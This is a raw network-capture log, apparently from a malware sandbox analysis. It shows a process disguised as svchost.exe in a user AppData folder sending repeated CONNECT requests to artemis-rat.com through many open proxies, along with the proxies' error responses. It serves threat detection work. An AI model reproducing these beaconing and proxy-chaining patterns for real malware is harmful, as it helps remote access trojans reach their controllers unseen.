                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3668192.168.2.557692111.16.50.12900243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.866271973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3669192.168.2.561685172.67.38.968056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.877151012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.031450033 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3670192.168.2.56153994.131.63.1205837843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.903801918 CET1260INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/6.0.0-20220501-re899e0c27
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 3670
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    Cache-Status: ezproxies.com
                                                                                    Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-seri


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3671192.168.2.56166238.54.6.39908043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.907161951 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3672192.168.2.560463125.227.225.157338943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.924510956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3673192.168.2.56159691.134.140.1605732056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.940517902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.879935026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3674192.168.2.56162343.131.248.1651567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.941548109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3675192.168.2.561729172.67.181.1978056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.950696945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.108165026 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:38 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3676192.168.2.56164631.207.38.668056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.977637053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.282212973 CET408INHTTP/1.1 405 Method Not Allowed
                                                                                    Date: Sat, 09 Mar 2024 12:14:38 GMT
                                                                                    Server: Apache
                                                                                    Allow: OPTIONS,HEAD,GET,POST
                                                                                    Content-Length: 224
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 43 4f 4e 4e 45 43 54 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method CONNECT is not allowed for this URL.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3677192.168.2.561759172.67.255.2248056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.991179943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.146224022 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:38 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3678192.168.2.56164243.155.130.1821567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.997962952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3679192.168.2.55841389.36.114.388043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.006280899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3680192.168.2.56165236.91.98.115818156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.018260002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.849144936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3681192.168.2.558425132.148.154.985096543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.030270100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3682192.168.2.561645120.76.42.209888856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.031286955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.849142075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3683192.168.2.56171727.96.235.1718056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.041199923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3684192.168.2.560486208.87.131.2402256643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.043554068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3685192.168.2.561694155.185.15.56312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.044732094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.454185009 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3686192.168.2.561789104.19.83.1288056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.045922995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.200264931 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:38 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3687192.168.2.561654103.49.202.2508056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.049516916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3688192.168.2.561679139.224.64.191808143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.049642086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.388667107 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3689192.168.2.561671185.104.112.628056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.053703070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.401191950 CET799INHTTP/1.1 500 Internal Server Error
                                                                                    Date: Sat, 09 Mar 2024 12:14:38 GMT
                                                                                    Server: Apache/2.4.56 (Debian)
                                                                                    Content-Length: 607
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
